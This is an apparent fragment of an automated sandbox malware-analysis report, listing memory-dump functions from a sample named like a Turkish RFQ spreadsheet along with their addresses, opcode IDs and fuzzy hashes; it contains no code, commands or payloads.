Source File: 00000001.00000002.1561043209.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_141d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cff5d27c5fca1d0f829e7d35fda7472242dbca63a9f33b28c8b844e77846cdc
Instruction ID: 3830902394c5e17bd72c0f22315c643501e2c96a496c5cac38347c1cdf3795a1
Opcode Fuzzy Hash: 5cff5d27c5fca1d0f829e7d35fda7472242dbca63a9f33b28c8b844e77846cdc
Instruction Fuzzy Hash: 672192B55093808FDB07CF24D594716BF71EB46214F28C5DBD8498F2A7C33A980ACB62

Function 07850A40 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f7415baf4ca09163dbbe9251fcf06f0159f8f204094d6613012771db76e8825
Instruction ID: b47a616455affc49668b8b12430e505818c33c49aa8c2cdcda1d25fef506b94f
Opcode Fuzzy Hash: 3f7415baf4ca09163dbbe9251fcf06f0159f8f204094d6613012771db76e8825
Instruction Fuzzy Hash: 5411C6B2F0010AEFCB126AA6E5441FDBFB0EB81354F6048A5C889F3194F63185348FE4

Function 078548C3 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a23e865e3dc821ee64dcc08ccd282ca8486474cb21f38809c0119a5f86124b5c
Instruction ID: c7191ad41852489e5842e076f5122abcf28a70f98a35d38498a8b3691ff7b33c
Opcode Fuzzy Hash: a23e865e3dc821ee64dcc08ccd282ca8486474cb21f38809c0119a5f86124b5c
Instruction Fuzzy Hash: A0215C71910218EFDF149FA9D8459ADBBF6EF89340F10812AE905A7360DB754841CF90

Function 0785CFA8 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bca018c522543862deb9943b9e0d17e845bb287015cddf0e808a74b7619bbbf
Instruction ID: 758b4a99ff3292a56149653859696ff077c64e6bed486cfa72581c8221a53a65
Opcode Fuzzy Hash: 2bca018c522543862deb9943b9e0d17e845bb287015cddf0e808a74b7619bbbf
Instruction Fuzzy Hash: D311E4B4D0820ADFCB40DFA9C4509AEBBF5FF59304F1185A5D818E7316E7B09A058F91

Function 0785CE68 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7be4fcb7fba364d48d47dba8ab667c89987633998ce86f08a57112a23133aa88
Instruction ID: 8c8a63779e1e9e19196877536b4f59545bf38d757012d54fe8c6694b97d3e748
Opcode Fuzzy Hash: 7be4fcb7fba364d48d47dba8ab667c89987633998ce86f08a57112a23133aa88
Instruction Fuzzy Hash: 4C21D6B4E1420ADFCB44CFA9C181AAEBBF5EB59300F609069D809E7711D7709A41DFA1

Function 0785DF41 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ab24724fb4dc84f03fa45f1e0bf74745656e1331390493bcdba4541c8a7db2c
Instruction ID: 446c9a6d514abcb04ff0b77f85b6f1c1a9e411273355c277b4cea4cbb2c0cad3
Opcode Fuzzy Hash: 6ab24724fb4dc84f03fa45f1e0bf74745656e1331390493bcdba4541c8a7db2c
Instruction Fuzzy Hash: 2D111CB0D15618DFDB18CF6AD8445ADBBF6BF9A301F10C169E809EB254C7309A41CF40

Function 0785D776 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41b0b8b74914ddd4c297a0a7959535cc93b9ef3bb3ec533f3a9e8e12425bd556
Instruction ID: e87e26924cdabffa711de852912c5eb11f0ac01d9ba4dd2fb077a1b2287d1c28
Opcode Fuzzy Hash: 41b0b8b74914ddd4c297a0a7959535cc93b9ef3bb3ec533f3a9e8e12425bd556
Instruction Fuzzy Hash: BB210FB8A1921DCFCB54CF54C9C0AEDB7B9AB1A311F109595DC1AE7340CB30AE828F61

Function 0785D85B Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75477044e31145888e8dd2b35a5dd9996e56b591ada5fed2b60310f9cf97c2c0
Instruction ID: 948e709bd410a5f8b17b2c771066e0e1821b96968bb2765f4357dda6d4e36995
Opcode Fuzzy Hash: 75477044e31145888e8dd2b35a5dd9996e56b591ada5fed2b60310f9cf97c2c0
Instruction Fuzzy Hash: 0F21C2B8A14219CFDB60CF54C9C4AADB7BABB1A310F109595DC49E7245C730AE818F62

Function 0120D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1560610602.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_120d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
Instruction ID: 3ef62e4faf9d65153751ee068d844691ae1066c21d980f361c94f2debdc3fa52
Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
Instruction Fuzzy Hash: 2D119D76504284CFCB16CF54E5C4B16BF62FB88224F2486A9DD490B697C33AD45ACBA1

Function 0120D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1560610602.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_120d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
Instruction ID: d9dd29d67171b8d2c2fcacf3f69947a8bd03e76c7253d7fd0814a02757f0a130
Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
Instruction Fuzzy Hash: 44112676504284CFCB02CF84D5C0B56BF72FB84324F24C2A9D9090B697C33AE456CBA1

Function 07858704 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5305313f15b47f65bf98052c61335b9fdb2d7594167f774b8bc0553ece1c380b
Instruction ID: 4cc425e9cbe618b2a61e4086c51c78dbc04dae3613e5327bf2edad2b75ab018f
Opcode Fuzzy Hash: 5305313f15b47f65bf98052c61335b9fdb2d7594167f774b8bc0553ece1c380b
Instruction Fuzzy Hash: 5E21D3B59043499FCB10DF9AD884ADEBBF5FB98310F10841AE919A7310C375A954CFA5

Function 0785CF13 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d174cfb1617f37797ec1ba120168b4a66fc9a7f3a4c6985710ad1f86c72d795
Instruction ID: 8a7cef78055878fff52c3e9d3c91350898fadd802d281903e578d719a30dd80f
Opcode Fuzzy Hash: 1d174cfb1617f37797ec1ba120168b4a66fc9a7f3a4c6985710ad1f86c72d795
Instruction Fuzzy Hash: 9F1128B4D1830AEFCB45DFA9C4509ADBBF5FB5A304F108696E808E7216D3709A40CF91

Function 078548C8 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fecc35a723b181057baafff9f0d4f418ef05aec0f2a4b63abb24bda2eb457a8
Instruction ID: 8b671ced8eae857e1b264fe0a9da193eb8b79a2e5cca444041ceb93e195f0ab7
Opcode Fuzzy Hash: 4fecc35a723b181057baafff9f0d4f418ef05aec0f2a4b63abb24bda2eb457a8
Instruction Fuzzy Hash: 22113771E10218EFDF14DFA9D849AAEBBF6FF89200F10812AE801A7260DB754841CF90

Function 0785D4E0 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47560c842e116f0f99a0d6de7726a141aaf05ac63f48474b891cf5687876fbd6
Instruction ID: f2eae22bb08aec07d8e2bee2f4fd3a40df6b66ff6f96c2b683e3efd7c5a6d7bc
Opcode Fuzzy Hash: 47560c842e116f0f99a0d6de7726a141aaf05ac63f48474b891cf5687876fbd6
Instruction Fuzzy Hash: 4D11F6B1D006598BEB19CF6AC8447DEBFF3AFC9300F14C56AD809A6264DB340946CF50

Function 0141D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1561043209.000000000141D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0141D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_141d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
Instruction ID: 400135fc2fe05cc84227f4b5418530bf6a5b7eb6a52cad1d6c74dce9db25ada0
Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
Instruction Fuzzy Hash: F511BEB5904280DFCB02CF54C5C4B16BBA1FB84224F24C6AED8494B7A6C33AD40ACB51

Function 0785BDC2 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21ea88811e41c8081446b9a8b783c6e66c763a390b005e1382b93800cd1727c9
Instruction ID: d129b0280c53e751c6ce5956ca0b68e94cc62842de46a3a6c989a170f1eea7d1
Opcode Fuzzy Hash: 21ea88811e41c8081446b9a8b783c6e66c763a390b005e1382b93800cd1727c9
Instruction Fuzzy Hash: AD114FF490A20ACFDB14CF58C581AEDBBBAFB6A300F219195D809E7242C7749E40CF61

Function 0785256F Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2581c2250dcb991129049aadef5b24952f6302662d47fd849daa592a769d4f3b
Instruction ID: 5e2eabd3dfee5dd42ecda87c717468bd9de011943a753374daae37e54b411246
Opcode Fuzzy Hash: 2581c2250dcb991129049aadef5b24952f6302662d47fd849daa592a769d4f3b
Instruction Fuzzy Hash: 8D118E70E0021A8FDB04DFA8D8517AEBBB0FF49314F048169C915F7392DB784945DB90

Function 07850A3B Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1c7b070d1b084ec20956f0ca7467d4dc30aa5873b287a57fadf935995a6471a
Instruction ID: 7031ef76e24dad81c813db846e3de1e763444bdf46a15a47aa263b952191e92d
Opcode Fuzzy Hash: e1c7b070d1b084ec20956f0ca7467d4dc30aa5873b287a57fadf935995a6471a
Instruction Fuzzy Hash: 6EF028F1F00116AB87136FB6E4441E97FF0DF91354F2448A6DC49E3290F63086144BE0

Function 07852578 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3f0a54e9e7bdab21160f49b4d3911b6b4b69b134f70b1c295a2d1d9cc331e83
Instruction ID: 157ab762f0de8e259ab79b120f75c1a10427d53397572b8662ad66555464d82e
Opcode Fuzzy Hash: c3f0a54e9e7bdab21160f49b4d3911b6b4b69b134f70b1c295a2d1d9cc331e83
Instruction Fuzzy Hash: 91015EB0E0021A9FDB04EFA8C8517AEBBB1FF49314F148529D915F7391DB789941DB90

Function 07855CF1 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9eea5a21fdab73fbb5605ebfe3521231b483873af320f1bac6e01f6aaee384b
Instruction ID: 5cc5e37667b2438ab30dd4b6290f0fdfe5f01529913275a350976001908dc3f4
Opcode Fuzzy Hash: d9eea5a21fdab73fbb5605ebfe3521231b483873af320f1bac6e01f6aaee384b
Instruction Fuzzy Hash: 80016D3A305255AFCF064FA9A8098AEBFA6FB89660710802BF905C3211DB3548259BA1

Function 0785267B Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 306ef8bc5beb22eb362d40e80116ed741be6566b404c108e1e27fab8ec178005
Instruction ID: a89697f7ceb883776dc217013f72efc3e4b146ddb833c6bbfc2df744f7e63a59
Opcode Fuzzy Hash: 306ef8bc5beb22eb362d40e80116ed741be6566b404c108e1e27fab8ec178005
Instruction Fuzzy Hash: 9D01A23291070ADBCF11EFA4DC448C9FB75FFD9344B118B2AE4056B120EB71A69ACB90

Function 0785E3A8 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d1d036cdb1ca2bf5938fb4f4d70d7305c9b99ac2698a687ee64194e60b0759e
Instruction ID: 888dc6533cbf2b449a5b4ff7875a734c234931c8401811782f3d671379f94a10
Opcode Fuzzy Hash: 7d1d036cdb1ca2bf5938fb4f4d70d7305c9b99ac2698a687ee64194e60b0759e
Instruction Fuzzy Hash: 0B01E874A14108EFDB04DFA8CA84AADBBF9EF99600F15D1A4D8099B262D730DE10DB40

Function 0785E32F Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb197dee640ed08e933b5931a453da7dc417f1ccb7dca5f1e7e59eb384a4d574
Instruction ID: 73a09a88e839d8568bbeb5c09c888c401083926372439ce6b2629dcf78b43888
Opcode Fuzzy Hash: cb197dee640ed08e933b5931a453da7dc417f1ccb7dca5f1e7e59eb384a4d574
Instruction Fuzzy Hash: 11F03CB491D20CEBCB04CF65C9459FCBBF9BBAAA05F4491A5D8099F211D7309B44DB80

Function 0785DA64 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d017231bcc749beadd99312c3cecd7d6f32d1100f517414fdcc60d719fac01b0
Instruction ID: 634db1b8a86df387abc8f964f8dabbcefe9754d4c097eb493a903393b4a1d38d
Opcode Fuzzy Hash: d017231bcc749beadd99312c3cecd7d6f32d1100f517414fdcc60d719fac01b0
Instruction Fuzzy Hash: 6B015AF4A1914DCBCF11CB50C5C09FDB7FAAB2A355F109684CC5AA6286D730AD828A22

Function 07855D00 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 090517d0c2131656c533c5fe021b05f51e6e831ff542355bcf8aebb00dfb8a17
Instruction ID: 2f02428a341454afcaf3b0d50c5bfa0fc47cf211a62098d0733d4b53a6107ec7
Opcode Fuzzy Hash: 090517d0c2131656c533c5fe021b05f51e6e831ff542355bcf8aebb00dfb8a17
Instruction Fuzzy Hash: 13F01275700219AFCF055F99E84986EBFA6FB8C660B10C026FD15C3310DB758C319B90

Function 07856A06 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8836c26ece3e8584b690ff1f62ca6c2f44ad6c26af0a395a3b2ce5c9710d4122
Instruction ID: a4ee8dfb9256eeb160e8b8ef62e6bbe56a43463ad29d24216effc145a58a7c1d
Opcode Fuzzy Hash: 8836c26ece3e8584b690ff1f62ca6c2f44ad6c26af0a395a3b2ce5c9710d4122
Instruction Fuzzy Hash: 7AF030743105114FC744DF69C484A6A77EAAFC9A10B1480BAE90ACF370DE70DC4387A0

Function 0785D6DD Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 308472b3b031304e90e5a0b114c30bd3920b41bac9802d46f8bd43892df45386
Instruction ID: 327050ae9fa435e81a748488b9e4c62a118741105d89bcee42af77b87abc888d
Opcode Fuzzy Hash: 308472b3b031304e90e5a0b114c30bd3920b41bac9802d46f8bd43892df45386
Instruction Fuzzy Hash: D2014BB4A08149CFCF10CF54C5C0AEDB7FAAB6A314F209694CC49E7285C730AD918B62

Function 07858EAF Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c94a84b94e1b293f8deb8643b6dba6ff1008ccd37f58ddba8155d006eb6080e2
Instruction ID: ba086e5fd19439fe436ba234fdaf94a5224816b6aa94738c6cbfd9694487db51
Opcode Fuzzy Hash: c94a84b94e1b293f8deb8643b6dba6ff1008ccd37f58ddba8155d006eb6080e2
Instruction Fuzzy Hash: B6F08972500005AFDF04CF58DC81DEE7FB6EF55254B14816AE404D7214D7319951CB40

Function 0785D000 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db14da243fc1c2cb0dd5de658a563c697efcd59b0833d07f439130e9d3debe14
Instruction ID: 0bb55ef3aa4873c0ee5c7d2be10f3e936fec1f59506d902634e633d4db0099c8
Opcode Fuzzy Hash: db14da243fc1c2cb0dd5de658a563c697efcd59b0833d07f439130e9d3debe14
Instruction Fuzzy Hash: 21F092F0E1430BDFDB44DFA9C545AAEBFF1EB58310F108969D914EB200E7B586458B90

Function 07858ED1 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02fec25389d511368db5e19ca15596d39b182e445f650e4e3a187be005cfd17d
Instruction ID: 76e0dbb34759a761ad25a2e9a8a51386ae69c9a854492da8313fd89b575bd6f6
Opcode Fuzzy Hash: 02fec25389d511368db5e19ca15596d39b182e445f650e4e3a187be005cfd17d
Instruction Fuzzy Hash: B7F03072604118BFDF08DF68D851DDEBFFAEF59264B14806BE808D7221E631A9908B95

Function 07854198 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db68db2c79c83895c4f50a32e60544b0de14f7ec4cc96cd1f57e55cda7fe4a61
Instruction ID: d233433cbb366397056e092edb54c09cbff0d869e20a302f9ad9baf9e6244162
Opcode Fuzzy Hash: db68db2c79c83895c4f50a32e60544b0de14f7ec4cc96cd1f57e55cda7fe4a61
Instruction Fuzzy Hash: 80F08236C043A9AFCB11EBA8DC006DEBBB8EF86210F04C467E558E3141E7345659C7A1

Function 0785402B Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6669f69ee7e886d082cbbacc6e028ce6a9c4ecea868654456cee7e307872dba7
Instruction ID: 06b14165e24077dd4dbbc0bdb2999dbf9d6a91cf0d2c68f571878910f35356bf
Opcode Fuzzy Hash: 6669f69ee7e886d082cbbacc6e028ce6a9c4ecea868654456cee7e307872dba7
Instruction Fuzzy Hash: 20F05831C147699FCB41ABB8EC144DEBBB0FE86310B00C6ABE998B7111E7301699CB91

Function 0785D815 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 914ad5ae2c80649efeccdcb07d685235ccb82a01274d433ffca602eb5506cbd0
Instruction ID: e84c3b1829c35424fc7f647212dead02fd025fc9b02430c3961ec7ebe89cd7e0
Opcode Fuzzy Hash: 914ad5ae2c80649efeccdcb07d685235ccb82a01274d433ffca602eb5506cbd0
Instruction Fuzzy Hash: A5F0ECB4A1410DCBCB10CE54C5C0AEDB3FAAB5A355F209684CC59A6245C7309D818E72

Function 0785D010 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7850000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72b579cbbbd3000044f879e13e7aaa986d717f69f50d9f82218c720156d976c2
Instruction ID: d79f3e151004da376545528b1d74cc6cf86c7b9fb4ff048c9c33d8700c3bd63e
Opcode Fuzzy Hash: 72b579cbbbd3000044f879e13e7aaa986d717f69f50d9f82218c720156d976c2
Instruction Fuzzy Hash: D7F0DAF0E0430A9FDB44DFA9C945ABEBBF4AB48310F1085A9D918E7300D77595058BA4

Function 07853F10 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1565174809.0000000007850000.00000040.00000800.00020000.00000000.sdmp, Offset: 07850000, based on PE: false

